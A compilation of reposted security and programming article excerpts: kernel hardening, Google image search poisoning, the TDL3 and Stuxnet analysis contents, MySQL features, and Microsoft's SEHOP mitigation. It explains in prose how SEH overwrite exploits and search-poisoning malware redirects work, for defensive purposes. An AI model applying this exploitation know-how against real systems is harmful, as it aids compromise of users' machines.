sau alte bunuri virtuale disponibile în cadrul re?elei. Sursa: Facebook te pl

Securing The Kernel via Static Binary Rewriting and Program Shepherding Piotr Bania [: www.piotrbania.com :] 2011 Abstract Recent Microsoft security bulletins show that kernel vulnerabilities are becoming more and more important security threats. Despite the pretty extensive security mitigations many of the kernel vulnerabilities are still exploitable. Successful kernel exploitation typically grants the attacker maximum privilege level and results in total machine compromise. To protect against kernel exploitation, we have developed a tool which statically rewrites the Microsoft Windows kernel as well as other kernel level modules. Such rewritten binary files allow us to monitor control flow transfers during operating system execution. At this point we are able to detect whether selected control transfer flow is valid or should be considered as an attack attempt. Our solution is especially directed towards preventing remote kernel exploitation attempts. Additionally, many of the local privilege escalation attacks are also blocked (also due to additional mitigation techniques we have implemented). Our tool was tested with Microsoft Windows XP, Windows Vista and Windows 7 (under both virtual and physical machines) on IA-32 compatible processors. Our apparatus is also completely standalone and does not require any third party software. Download: http://www.piotrbania.com/all/articles/pbania-securing-the-kernel2011.pdf

Poisoned Google image searches becoming a problem Posted on 06 May 2011. If you are a regular user of Google's search engine you might have noticed that poisoned search results have practically become a common occurrence. Google has, of course, noticed this and does its best to mark the offending links as such, but it still has trouble when it comes to cleaning up its image search results. ISC's Bojan Zdrnja took it upon himself to explain how the attackers actually do it, and shows that it is actually rather simple. For one, they attack and compromise a great variety of legitimate websites - usually those which use Wordpress, since it often has vulnerabilities that can be easily exploited and the legitimate users are often lax when it comes to updating it. Then, they introduce PHP scripts in the sites' source code. "These scripts vary from simple to very advanced scripts that can automatically monitor Google trend queries and create artificial web pages containing information that is currently interested. That is actually how they generate new content – if you ever wondered how they had those web sites about Bin Laden up quickly it is because they automatically monitor the latest query trends and generate web pages with artificial content," he explains. They also harvest other sites for images, and embed them into the site. When the scripts detect Google's crawlers, they deliver to them pages containing the automatically generated content, and the pictures end up in the image search database. "The exploit happens when a user clicks on the thumbnail," says Zdrnja. "Google now shows a special page that shows the thumbnail in the center of the page, links to the original image (no matter where it is located) on the right and the original web site (the one that contained the image) in the background." Google displays all of this in an iframe, and the browser automatically sends the request to the compromised page. The PHP script inserted in it checks if the user has come from a Google results page, and if he did, it displays another script - this time it's a JavaScript one - that redirects the browser to another compromised site that serves malware. Users should be careful on what they click, but sometimes it is hard to detect malicious links. Zdrnja advises the use of browser add-ons such as the NoScript for the Firefox browser, but believes that Google could help by not using an iframe to display the results. More on Google image poisoning http://isc.sans.edu/diary/More+on+Google+image+poisoning/10822 Sursa: Poisoned Google image searches becoming a problem

Windows Phone 7 Development for Absolute Beginners 64 Parts This video series will help aspiring Windows Phone 7 developers get started. We'll start off with the basics and work our way up so in a few hours, you will know enough to build simple WP7 applications, such as a GPS aware note taking application. We'll walk you through getting the tools, knowing what an if statement is, to using the GPS built into the phone and much more! Our friend, Bob Tabor from .NET Tutorial Videos from Beginner to Expert | LearnVisualStudio.NET, will your guide through this series. Download the entire series Source Code in c# Download the entire series Source Code in VB.Net Series Introduction - Day 1 - Part 1 5 minutes, 34 seconds Installing Visual Studio 2010 Express for Windows Phone - Day 1 - Part 2 3 minutes, 3 seconds Writing your First Windows Phone 7 Application - Day 1 - Part 3 12 minutes, 34 seconds Overview of the Windows Phone 7 Emulator - Day 1 - Part 4 9 minutes, 4 seconds Dissecting the First Application you Wrote - Day 1 - Part 5 22 minutes, 1 second Managing Project Files and Understanding Compilation and Deployment - Day 1 - Part 6 8 minutes, 17 seconds Overview of Visual Studio 2010 Express for Windows Phone IDE - Day 1 - Part 7 21 minutes, 17 seconds Working with Projects - Day 1 - Part 8 12 minutes, 58 seconds Declaring Variables and Assigning Values - Day 1 - Part 9 17 minutes, 56 seconds Accepting Input and Assigning Values from a TextBox - Day 1 - Part 10 12 minutes, 50 seconds Lista tutoriale: http://channel9.msdn.com/Series/Windows-Phone-7-Development-for-Absolute-Beginners

A Collection of Examples of 64-bit Errors in Real Programs September 25, 2010 4:01 AM PDT Abstract This article is the most complete collection of examples of 64-bit errors in the C and C++ languages. The article is intended for Windows-application developers who use Visual C++, however, it will be useful for other programmers as well. Introduction Our company OOO "Program Verification Systems" develops a special static analyzer Viva64 that detects 64-bit errors in the code of C/C++ applications. During this development process we constantly enlarge our collection of examples of 64-bit defects, so we decided to gather the most interesting ones in this article. Here you will find examples both taken directly from the code of real applications and composed synthetically relying on real code since such errors are too "extended" throughout the native code. The article only demonstrates various types of 64-bit errors and does not describe methods of detecting and preventing them. If you want to know how to diagnose and fix defects in 64-bit programs, please see the following sources: Lessons on development of 64-bit C/C++ applications [1]; About size_t and ptrdiff_t [2]; 20 issues of porting C++ code on the 64-bit platform [3]; PVS-Studio Tutorial [4]; A 64-bit horse that can count [5]. You may also try the demo version of the PVS-Studio tool that includes the Viva64 static code analyzer which detects almost all the errors described in this article. The demo version of the tool can be downloaded here: Download PVS-Studio. Example 1. Buffer overflow struct STRUCT_1 { int *a; }; struct STRUCT_2 { int x; }; ... STRUCT_1 Abcd; STRUCT_2 Qwer; memset(&Abcd, 0, sizeof(Abcd)); memset(&Qwer, 0, sizeof(Abcd)); In this program, two objects of the STRUCT_1 and STRUCT_2 types are defined which must be zeroed (all the fields must be initialized with nulls) before being used. While implementing the initialization, the programmer decided to copy a similar line and replaced "&Abcd" with "&Qwer" in it. But he forgot to replace "sizeof(Abcd)" with "sizeof(Qwer)". Due to mere luck, the sizes of the STRUCT_1 and STRUCT_2 structures coincided on a 32-bit system and the code has been working correctly for a long time. When porting the code on the 64-bit system, the size of the Abcd structure increased and it resulted in a buffer overflow error (see Figure 1). Figure 1 - Schematic explanation of the buffer overflow example Such an error is difficult to detect if the data which should be used much later get spoiled. Articol: http://software.intel.com/en-us/articles/collection-of-examples-of-64-bit-errors-in-real-programs/

TDL3: The Rootkit of All Evil? Account of an Investigation into a Cybercrime Group Aleksandr Matrosov, senior virus researcher Eugene Rodionov, rootkit analyst Contents DOGMA MILLIONS CYBERCRIME GROUP ............................................................................................... 3 DOGMA MILLIONS ....................................................................................................................................... 3 THE DROPPER ...................................................................................................................................... 8 DETECTING VIRTUAL MACHINE ENVIRONMENT ..................................................................................................... 8 CHECKING LOCALES ...................................................................................................................................... 9 INSTALLING KERNEL MODE DRIVER .................................................................................................................. 10 Using AddPrintProcessor and AddPrintProvidor API ........................................................................... 10 Using known dlls ............................................................................................................................... 13 THE ROOTKIT ..................................................................................................................................... 15 INFECTION ................................................................................................................................................ 15 READING AND WRITING DATA FROM/TO HARD DISK ............................................................................................ 19 HOW TO SURVIVE AFTER REBOOT .................................................................................................................... 21 INJECTING MODULES INTO PROCESSES .............................................................................................................. 22 ENCRYPTED FILE SYSTEM ..................................................................................................................... 22 INJECTOR ........................................................................................................................................... 25 COMMUNICATION PROTOCOL ........................................................................................................................ 26 TASKS ..................................................................................................................................................... 27 APPENDIX A ....................................................................................................................................... 28 APPENDIX B ....................................................................................................................................... 29 APPENDIX C ....................................................................................................................................... 30 APPENDIX D ....................................................................................................................................... 31 Download: http://www.eset.com/us/resources/white-papers/TDL3-Analysis.pdf

Stuxnet Under the Microscope O analiza detaliata a celor de la ESET. Aleksandr Matrosov, Senior Virus Researcher Eugene Rodionov, Rootkit Analyst David Harley, Senior Research Fellow Juraj Malcho, Head of Virus Laboratory Contents 1 INTRODUCTION ................................................................................................................................ 5 1.1 TARGETED ATTACKS ............................................................................................................................. 5 1.2 STUXNET VERSUS AURORA ..................................................................................................................... 7 1.3 STUXNET REVEALED........................................................................................................................... 11 1.4 STATISTICS ON THE SPREAD OF THE STUXNET WORM ................................................................................ 15 2 MICROSOFT, MALWARE AND THE MEDIA ....................................................................................... 17 2.1 SCADA, SIEMENS AND STUXNET .......................................................................................................... 17 2.2 STUXNET TIMELINE............................................................................................................................ 19 3 DISTRIBUTION ................................................................................................................................ 24 3.1 THE LNK EXPLOIT .............................................................................................................................. 24 3.1.1 Propagation via External Storage Devices ............................................................................... 27 3.1.2 Metasploit and WebDAV Exploit .............................................................................................. 27 3.1.3 What Do DLL Hijacking Flaws and the LNK Exploit have in Common? ..................................... 28 3.2 LNK VULNERABILITY IN STUXNET .......................................................................................................... 29 3.3 THE MS10-061 ATTACK VECTOR ......................................................................................................... 31 3.4 NETWORK SHARED FOLDERS AND RPC VULNERABILITY (MS08-067) ......................................................... 34 3.5 0-DAY IN WIN32K.SYS (MS10-073) .................................................................................................... 35 3.6 MS10-092: EXPLOITING A 0-DAY IN TASK SCHEDULER ............................................................................. 40 4 STUXNET IMPLEMENTATION ........................................................................................................... 45 4.1 USER-MODE FUNCTIONALITY ................................................................................................................ 45 4.1.1 Overview of the main module .................................................................................................. 45 4.1.2 Injecting code ........................................................................................................................... 46 4.1.3 Injecting into a current process ................................................................................................ 47 4.1.4 Injecting into a new process ..................................................................................................... 50 4.1.5 Installation ............................................................................................................................... 50 4.1.6 Exported functions.................................................................................................................... 52 4.1.7 RPC Server ............................................................................................................................... 56 4.1.8 Resources ................................................................................................................................ 58 4.2 KERNEL-MODE FUNCTIONALITY ............................................................................................................. 58 4.2.1 MRXCLS.sys ............................................................................................................................... 60 4.2.2 MRXNET.sys .............................................................................................................................. 64 4.3 STUXNET BOT CONFIGURATION DATA .................................................................................................... 65 4.4 REMOTE COMMUNICATION PROTOCOL .................................................................................................. 66 CONCLUSION ......................................................................................................................................... 70 APPENDIX A ........................................................................................................................................... 71 APPENDIX B ........................................................................................................................................... 74 APPENDIX C ........................................................................................................................................... 75 APPENDIX D .......................................................................................................................................... 82 APPENDIX E ........................................................................................................................................... 84 Download: http://www.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf

Writing MySQL Programs Using C Author: Paul DuBois Many web developers view development of C programs as a bit of a black art. Development of programs in a compiled language such as C is vastly different from the development of applications in a scripting language. To familiarize more developers with the MySQL C API, we present a three-part series of articles tailored to developers looking to get into C program development with MySQL. This first article is the full chapter from Paul DuBois' industry-standard work, MySQL, Fourth Edition, from Addison-Wesley. The second article, from Mark Schoonover, to be published next week, will cover development with the C API using the Eclipse CDT to write a sample program. The third article, also from MarkSchoonover, will go into more depth and expand the example program usingmore advanced features of the API. The chapter covers a lot of ground, covering the following topics: Starting development with the C API for MySQL How to write client programs that communicate with the server over secure connnections using the Secure Sockets Layer (SSL) protocol. How to write applications that use libmysqld, the embedded server library. How to send multiple statements to the server at once and then process the result sets that come back. How to use server-side prepared statements. And, without further ado, please download Chapter 7 of MySQL, Fourth Edition, by Paul DuBois (ISBN 0-672-32938-7). Used by permission. Copyright © 2009 Pearson Education, Inc. All rights reserved. Download: http://www.kitebird.com/mysql-book/ch07-4ed.pdf

Developing Database Applications Using MySQL Connector/C++ This tutorial will show you the essential steps to build and install MySQL Connector/C++ driver, with simple examples to connect, insert, and retrieve data from a MySQL database. Because the focus is on database connectivity from a C++ application, this document assumes that some kind of MySQL database is already up and accessible from the client machine. Application developers who are new to MySQL Connector/C++ but not to C++ programming and MySQL database, are the target audience of this tutorial. Listed below are the tools and technologies used to compile, build and run the examples in this tutorial. Database MySQL Server 5.1.24-rc C++ Driver MySQL Connector/C++ 1.0.5 MySQL Client Library MySQL Connector/C 6.0 Compiler Sun Studio 12 C++ compiler Make CMake 2.6.3 Operating System OpenSolaris 2008.11 32-bit CPU / ISA Intel Centrino / x86 Hardware Toshiba Tecra M2 Laptop CONTENTS MySQL C++ Driver Based on JDBC 4.0 Specification Installing MySQL Connector/C++ Runtime Dependencies IDE for Developing C++ Applications Create the City Table in the test Database for Code Examples Testing the MySQL Database Connectivity With the Connector/C++ Using Prepared Statements Using Transactions Accessing Result Set Metadata Accessing Database Metadata Accessing Parameter Metadata from a PreparedStatement Object Catching Exceptions Debug Tracing with MySQL Connector/C++ For More Information Tutorial: http://dev.mysql.com/tech-resources/articles/mysql-connector-cpp.html

What's New in MySQL 5.6 With MySQL 5.5 generally available and being deployed all over the planet, the architects and strategists can start looking ahead to the exciting new thing with "SQL" in its name: MySQL 5.6. MySQL 5.6 builds on the momentum of 5.5, and Oracle's investment and commitment to MySQL, by delivering better performance and scalability. At this year's MySQL Conference & Expo, you'll hear about: Optimizer improvements for all-around query performance. InnoDB improvements for higher transactional throughput. New NoSQL-style memcached APIs. Partitioning improvements for querying and managing huge tables. Replication improvements covering many aspects. Better performance monitoring by expanding the data available through the PERFORMANCE_SCHEMA. Here are the features that you will get as a graduated series of MySQL 5.6 development milestone releases. The first such milestone release, MySQL 5.6.2, is available for download right now at MySQL :: MySQL Downloads. Start beta testing the 5.6 release now and give feedback to the MySQL engineering team. Performance Improvements Optimizer Improvements Index Condition Pushdown Moves more of the processing for WHERE clauses to the storage engine. Instead of fetching entire rows to evaluate against a set of WHERE clauses, ICP sends those clauses to the storage engine, which can prune the result set by examining index tuples. The result is less I/O overhead for the base table, and less internal communication overhead for the server and the storage engine. This feature works with InnoDB, MyISAM, and NDBCLUSTER tables. Read more about index condition pushdown. Multi-Range Read Until the day when you have all the SSDs you want, it's faster to read data sequentially from disk than to do random accesses. For secondary indexes, the order for the index entries on disk is different than the order of disk blocks for the full rows. Instead of retrieving the full rows using a sequence of small out-of-order reads, MRR scans one or more index ranges used in a query, sorts the associated disk blocks for the row data, then reads those disk blocks using larger sequential I/O requests. The speedup benefits operations such as range index scans and equi-joins on indexed columns. (Think InnoDB foreign keys.) Works all storage engines. Read more about multi-range read. File Sort Optimization For queries that combine ORDER BY non_indexed_column and a LIMIT x clause, this feature speeds up the sort when the contents of X rows can fit into the sort buffer. Works with all storage engines. InnoDB Improvements MySQL 5.6 builds on the platform of InnoDB fully integrated as the default storage engine, which happened way back in MySQL 5.5. Persistent Optimizer Stats Provides improved accuracy of InnoDB index statistics, and consistency across MySQL restarts. InnoDB precomputes statistics that help the optimizer decide which indexes to use in a query, by sampling a portion of the index. You can adjust the amount of sampling that InnoDB does for each index. The resulting statistics can now persist across server restarts, rather than being recomputed (and possibly changing) due to restarts and some runtime events. The more accurate statistics can improve query performance, and the persistence aspect can keep query performance stable. This feature is controlled by the configuration options innodb_analyze_is_persistent, innodb_stats_persistent_sample_pages, and innodb_stats_transient_sample_pages. When the persistent stats feature is enabled, the statistics are only recomputed when you explicitly run ANALYZE TABLE for the table. Read more about Persistent Optimizer Stats. New INFORMATION_SCHEMA Tables Once InnoDB information was made available for queries through the INFORMATION_SCHEMA in MySQL 5.5, people clamored for more kinds of status and monitoring information. The SQL interface is more standardized and predictable than parsing the text output from SHOW STATUS commands. Metrics table: Provides a generic and comprehensive resource and performance monitoring framework for InnoDB. The new I_S table is INNODB_METRICS. System Tables: Makes the InnoDB internal data dictionary available for SQL queries, for convenience of monitoring. The new I_S tables are INNODB_SYS_TABLES, INNODB_SYS_TABLESTATS, INNODB_SYS_INDEXES, INNODB_SYS_COLUMNS, INNODB_SYS_FIELDS, INNODB_SYS_FOREIGN, and INNODB_SYS_FOREIGN_COLS. Buffer Pool Information table: Displays buffer pool page information for tuning on large-memory or highly loaded systems. (Highly requested by customers and community users.) The new I_S tables are INNODB_BUFFER_PAGE, INNODB_BUFFER_PAGE_LRU, and INNODB_BUFFER_POOL_STATS. Additional Optimizer Support InnoDB supports the ICP, MRR, and file sort optimizer features mentioned earlier. Split Kernel Mutex The InnoDB team continues to remove bottlenecks for busy systems. Now instead of a single mutex controlling concurrent access to core InnoDB operations, several more fine-grained mutexes and rw-locks reduce contention on a busy system. In particular, the subsystems for transaction control, MVCC views, and locking now all have separate mutexes or rw-locks. Read more about the kernel mutex split. Multi-Threaded Purge InnoDB now has multiple purge threads, making purge operations across multiple tables more efficient. Originally, purge operations were handled by the InnoDB master thread, leading to contention with other InnoDB operations; in MySQL 5.5, purge was moved into a single separate thread, and in MySQL 5.6 you can set innodb_purge_threads to a value greater than 1. Read more about multiple purge threads. Separate Flush Thread A separate http://dev.mysql.com/doc/refman/5.6/en/glossary.html#glos_flush">flush thread (page_cleaner) makes flushing operations more efficient. This operation was formerly controlled by the InnoDB master thread, leading to contention with other InnoDB operations. Read more about the separate flush thread. Pruning the InnoDB Table Cache To ease the memory load on systems with huge numbers of tables, InnoDB now frees up the memory associated with an opened table. An LRU algorithm selects tables that have gone the longest without being accessed. To reserve more memory for open tables, increase the value of the --table_definition_cache=# configuration option. Read more about the InnoDB table cache. NoSQL Interface via memcached The ever-increasing performance demands of web-based services has generated significant interest in providing NoSQL access methods to MySQL – maintaining all of the advantages of your existing relational database infrastructure, while providing blazing fast performance for simple queries, using an API to complement regular SQL access to your data. Using the memcached API, web services can now directly access the InnoDB storage engine without transformations to SQL, ensuring low latency and high throughput for read/write queries. Operations such as SQL parsing are eliminated and more of the server's hardware resources (CPU, memory and I/O) are dedicated to servicing the query within the storage engine itself. By using memcached, developers and DBAs are able to: Preserve investments in memcached infrastructure by reusing existing memcached clients and eliminating the need for application changes. Access the full range of memcached client libraries and platforms, providing maximum deployment flexibility and consistently high performance across all supported environments. Extend memcached functionality by integrating a persistent, crash-safe, transactional database back-end offering ACID compliance. The InnoDB memcached API is available in Labs.mysql.com. Read more about memcached API for InnoDB. The MySQL Cluster 7.2 Development Milestone Release also previews a memcached interface for the NDBCLUSTER storage engine. Read more about the NoSQL interface for NDBCLUSTER. Scalability Improvements Data gets bigger. That's a fact of life. Partitioned tables help to segment that data into manageable portions, while keeping the convenience of a SQL interface to the full table. These new features make certain operations with partitions faster and more convenient. Partitioning Improvements Explicit Partition Selection With partitioned tables, MySQL can restrict processing to only the relevant portions of a big data set. Now you can directly define which partitions are used in a query, DML, or data load operation, rather than repeating all the partitioning criteria in each statement. SELECT * FROM employees PARTITION (p0, p2); DELETE FROM employees PARTITION (p0, p1); UPDATE employees PARTITION (p0) SET store_id = 2 WHERE fname = 'Jill'; SELECT e.id, s.city FROM employees AS e JOIN stores PARTITION (p1) AS s ...; Import / Export for Partitioned Tables To quickly bring a new data set into a partitioned table, or to export a partition or subpartition to manage it as a regular table, you can use the syntax ALTER TABLE ... EXCHANGE PARTITION. You specify a partition or subpartition of a partitioned table, and a non-partitioned table with a compatible structure, and this operation swaps their places without any expensive copy operation. ALTER TABLE e EXCHANGE PARTITION p0 WITH TABLE e2; This operation works with any storage engine that supports partitioned tables. Replication Improvements Replication is a fruitful area for enhancements to data integrity, availability, and let's not forget performance. Replication Improvements to Performance Optimized Row-Based Replication By only replicating partial "before" and "after" images for INSERT, UPDATE and DELETE events where primary keys or explicit columns were set in the SQL statement, performance can be increased while binary log disk space, network resources and server memory footprint are reduced. Multi-Threaded Slaves Replication performance is improved by using multiple execution threads to apply replication events to slave servers. The multi-threaded slave splits work between worker threads based on the database name, allowing updates to be applied in parallel rather than sequentially. As a result, replication throughput is increased and latency is reduced which minimizes the risk of replication lag, enabling slaves to serve the freshest updates to the application. The multi-threaded slave functionality is available now as part of the snapshot-next-mr-wl5563-labs build which can be downloaded from Labs.mysql.com. Replication Improvements to Data Integrity Crash-Safe Slaves Extends the robustness and ease-of-use of MySQL replication by making the slaves crash-safe when using transactional storage engines such as InnoDB. The slave can automatically recover from a failure and resume replicating DML updates, without the DBA having to access the master.info and relaylog.info files to manually roll back replication to the last successfully committed transaction, or to skip transactions. As a result, data integrity is enhanced and DBAs can be free to concentrate on more strategic data management activities. Replication Checksums Ensures the integrity of data being replicated to a slave by detecting data corruption and returning an error, preventing the slave itself from becoming corrupt. Checksums are implemented in the binary and relay logs as well as to individual replication events, allowing errors to be detected whether they are caused by memory, disk or network failures, or by the database itself. Checksum checking can be implemented on a per-slave basis, giving maximum flexibility in how and where it is deployed. Time-Delayed Replication You can define a time delay for events to be replicated from a master to each slave, defined in millisecond increments up to a maximum of 68 years! Time-Delayed Replication affords protection against operational errors made on the master, for example accidently dropping tables, in which event the slave can be promoted to the new master in order to restore the database to its previous state. Time-Delayed Replication can also be useful in testing application behavior by emulating any instances of replication lag. Time-Delayed Replication is implemented at the per-slave level (via holding execution of the SQL_THREAD), so you could configure multiple slaves to apply replication events immediately, and another slave to apply only after a delay of 5 minutes, therefore providing deployment flexibility. Replication Improvements to Usability Informational Log Events Enhances auditing and debugging when using Row-Based Replication by writing the original query to the binary log, which is then replicated with its associated row-based event to the slave. Remote Binlog Back-up Enhances operational efficiency by using the replication channel to create real-time back-ups from the binary log. By adding a "raw" flag, the binlog is written out to remote back-up servers, without having a MySQL database instance translating it into SQL statements, and without the DBA needing SSH access to each master server. Server UUIDs Automatically generates a Universally Unique Identifier (UUID) for each server, allowing MySQL Enterprise Monitor or any other monitoring tool to retrieve information about master and slave servers in a replication configuration. The UUID is available through a SQL query and in the output of the SHOW SLAVE STATUS command. This technique requires fewer database connections and works better with servers that are monitored remotely or that use virtual IP addresses. This feature is especially useful in large and highly dynamic replication environments, making auto-discovery more reliable and simplifying systems management. Instrumentation and Diagnostic Improvements via PERFORMANCE_SCHEMA MySQL 5.6 greatly enhances the PERFORMANCE_SCHEMA features for performance monitoring and tuning. The information in the performance_schema tables lets you see how various low-level items factor into overall database performance, which ones are the "hottest" under various workloads and system configurations, and trace issues back to the relevant file and line in the source code so you can really see what's happening behind the scenes. Read more about Performance Schema. Reduced Overhead The performance_schema code is further tuned in 5.6 to reduce the performance overhead of running with this feature enabled. Table I/O and Instrumentation The setup_object table enables a DBA to understand, analyze, and tune how an application generates I/O load related to table access on the MySQL database server. Table Locks Instrumentation The setup_object table enables a DBA to identify "hot tables" and other object-related bottlenecks caused by the data access patterns of an application. Session/User Level Instrumentation The setup_actors table enables a DBA to monitor the load generated from a specific user or application by selectively instrumenting specific end user/application connections. This is valuable to narrow down the monitoring data collected: a) by thread or session, by connections originating from a given user account, c) by connections originating from a given machine, d) by connections originating from a given user account on a given machine. Reducing the amount of instrumented connections also reduces the runtime overhead of the instrumentation in production. Global Performance Metric Summaries Globally aggregates the data collected by the PERFORMANCE_SCHEMA by thread / by object / by instrumentation point. Enables DBA to write monitoring scripts and applications. Table/Index I/O Summary The setup_object table aggregates table I/O data collected by the PERFORMANCE_SCHEMA, by index, by table. Aggregation shows which tables or indexes are "hot" and most used by an application, and helps to identify the application data access patterns. Table Lock Wait Summary Aggregates Table lock data collected by the PERFORMANCE_SCHEMA by table. This aggregation shows which "hot" tables are often locked by an application, and helps to identify the application bottlenecks caused by table locking. Statement-Level Instrumentation Enables a DBA to monitor statement execution, collect per-statement metrics, and analyze statements/executions by end user session or global aggregates. Quantify which statements are generated by an application, execution times/counts and access paths. Metrics reported give insight on the data volumes, the selectivity of WHERE clauses, and index usage patterns. Available in Labs.mysql.com. Show Contents of Host Cache - centralized logging of connection errors (Highly requested by customers and community users. Delivered via community code contribution.) Provides centralized logging of connection-related errors. MySQL internal host cache has been instrumented and exposed in a relational table for SQL access, providing a centralized logging of connection errors, with details about the exact root cause (SSL, DNS, Authentication plugins, ...) This enables a DBA to easily troubleshoot large deployments involving numerous users and heterogeneous applications. Available from Labs.mysql.com. Next Steps: Now that you have read about all the exciting new performance and scalability improvements, it's your turn to take MySQL 5.6 for a spin: Download MySQL 5.6: MySQL :: MySQL Downloads. For the more experimental features listed here, get them at MySQL :: MySQL Server Snapshots. Read the MySQL 5.6 docs: MySQL :: MySQL Documentation: MySQL Reference Manuals Blog about your experience: Planet MySQL Join the discussion: MySQL :: MySQL Forums Sursa: MySQL :: What's New in MySQL 5.6

Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP swiat, 2 Feb 2009 5:53 PM One of the responsibilities of Microsoft’s Security Engineering Center is to investigate defense in depth techniques that can be used to make it harder for attackers to successfully exploit a software vulnerability. These techniques are commonly referred to as exploit mitigations and have been delivered to users in the form of features like /GS, Data Execution Prevention (DEP), and Address Space Layout Randomization (ASLR). In Windows Server 2008 and Windows Vista SP1, Microsoft released support for a new platform mitigation known as Structured Exception Handler Overwrite Protection (SEHOP). The purpose of this article is to explain the problem this feature is attempting to solve, how it goes about solving it, and what you can do take advantage of it. The exploitation technique: SEH overwrites The purpose of the SEHOP mitigation is to prevent an attacker from being able to make use of the Structured Exception Handler (SEH) overwrite exploitation technique. This exploitation technique was publicly documented by David Litchfield of NGS Software in a research paper that he published in September, 2003[1]. Since this publication, the SEH overwrite technique has become a standard weapon in an attacker’s arsenal. Roughly 20% of the exploits included in the latest version of the Metasploit framework make use of the SEH overwrite technique. SEH overwrites are also commonly used by exploits that target the increasing number of browser-based vulnerabilities[4]. At a high-level, the SEH overwrite technique uses a software vulnerability to execute arbitrary code by abusing the 32-bit exception dispatching facilities provided by Windows. At a functional level, an SEH overwrite is generally accomplished by using a stack-based buffer overflow to overwrite an exception registration record that has been stored on a thread’s stack. To provide some context, an exception registration record is composed of two fields: a next pointer and an exception handler function pointer. The next pointer is used to link an exception registration record to the next record in the singly-linked list of registered exception handlers. The exception handler function pointer is called by the Windows exception dispatcher when an exception occurs. The definition for an exception registration record can be seen below: typedef struct _EXCEPTION_REGISTRATION_RECORD { struct _EXCEPTION_REGISTRATION_RECORD *Next; PEXCEPTION_ROUTINE Handler; } EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD; After an exception registration record has been overwritten, an exception must be raised so that the exception dispatcher will attempt to handle it. This can be accomplished in a number of ways, such as by overwriting a return address on the stack with a bogus address in order to cause an access violation exception to be raised. When an exception is raised, the exception dispatcher will attempt to enumerate the list of exception registration records for the thread and call the exception handler that is associated with each record. By corrupting the next pointer and exception handler function pointer of one of the exception registration records, the exception dispatcher can be made to execute code from an arbitrary address as specified by the corrupt exception handler function pointer. In many cases, an attacker will choose to overwrite the exception handler function pointer with an address that contains instructions that are equivalent to a pop reg, pop reg, ret. This allows an attacker to reliably execute arbitrary code by transferring control to the EstablisherFrame that the exception dispatcher passes as the second parameter when calling an exception handler. This works because the EstablisherFrame parameter holds the address of the attacker-controlled exception registration record. Attackers have also used heap spraying in conjunction with an SEH overwrite to reliably execute arbitrary code. The following diagram illustrates what an SEH overwrite would typically look like from an exploitation perspective: The mitigation technique: SEHOP There are two general approaches that can be considered when attempting to mitigate the SEH overwrite exploitation technique. The first approach involves making changes to the compiled versions of code such that executable files are made to contain metadata that the platform would need to properly mitigate this technique. Microsoft pursued this approach and released a functional mitigation with Visual Studio 2003. This mitigation took the form of a new linker flag known as /SAFESEH. Unfortunately, the need to rebuild executables in combination with the inability to completely handle cases where an exception handler is pointed outside of an image file make the SafeSEH approach less attractive. The details relating to how SafeSEH works are beyond the scope of this article, but more information can be found on MSDN[2]. The second approach involves adding dynamic checks to the exception dispatcher that do not rely on having metadata derived from a binary. This is the approach taken by SEHOP. At a high-level, SEHOP prevents attackers from being able to use the SEH overwrite technique by verifying that a thread’s exception handler list is intact before allowing any of the registered exception handlers to be called. This mitigation technique is made possible because of an implicit side effect of an SEH overwrite. When the majority of stack-based buffer overflows occur, an attacker will implicitly overwrite the next pointer of an exception registration record prior to overwriting the record’s exception handler function pointer. Since the next pointer is corrupted, the integrity of the exception handler chain is broken. This insight, in combination with ASLR, is what allows SEHOP to effectively mitigate SEH overwrites. From an implementation perspective, SEHOP achieves this functionality in two distinct steps. The first step involves the insertion of a symbolic exception registration record as the tail record in a thread’s exception handler list. This step occurs when a thread first begins executing in user mode. Since exception registration records are always inserted at the head of the exception handler list, the symbolic record is guaranteed to be the final exception registration record. The second step consists of walking the exception handler list at the time that an exception is being dispatched to ensure that the symbolic record can be reached and that it is valid. This step happens when the exception dispatcher is notified that an exception has occurred in user mode. If the symbolic record cannot be reached, the exception dispatcher can assume that the exception handler list is corrupt and that an SEH overwrite may have occurred. The exception dispatcher is then able to safely terminate the process. If the symbolic record is found, the exception dispatcher is able to proceed as it normally would and call each of the registered exception handlers. An illustration of this logic can be seen in the following diagram: How you can use SEHOP SEHOP is enabled by default on Windows Server 2008 and disabled by default on Windows Vista SP1. The primary reason this feature was disabled by default on Windows Vista SP1 was due to a lack of adequate application compatibility data. KB article 956607 documents how SEHOP can be enabled or disabled on a system-wide basis[3]. Wrapping up We are continuing to investigate new and enhanced exploit mitigation techniques and feel that SEHOP is a valuable addition that can help protect users. We encourage users to enable this feature if it is not enabled by default in order to better protect themselves against the SEH overwrite exploitation technique. For more information about the origins of SEH overwrites and SEHOP, it may be helpful to refer to the cited work[1,5]. Matt Miller, MSEC Security Science *Posting is provided "AS IS" with no warranties, and confers no rights.* References [1] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server. Sep, 2003. Information Security Software [2] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers). /SAFESEH (Image has Safe Exception Handlers) [3] Microsoft Corporation. SEHOP. How to enable Structured Exception Handling Overwrite Protection (SEHOP) in Windows operating systems [4] Microsoft Corporation. Microsoft Security Intelligence Report volume 5. Nov, 2008. Download details: Microsoft Security Intelligence Report volume 5 (January [5] skape. Preventing the Exploitation of SEH Overwrites. Sep, 2006. Uninformed - vol 5 article 2 Sursa: Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP - Security Research & Defense - Site Home - TechNet Blogs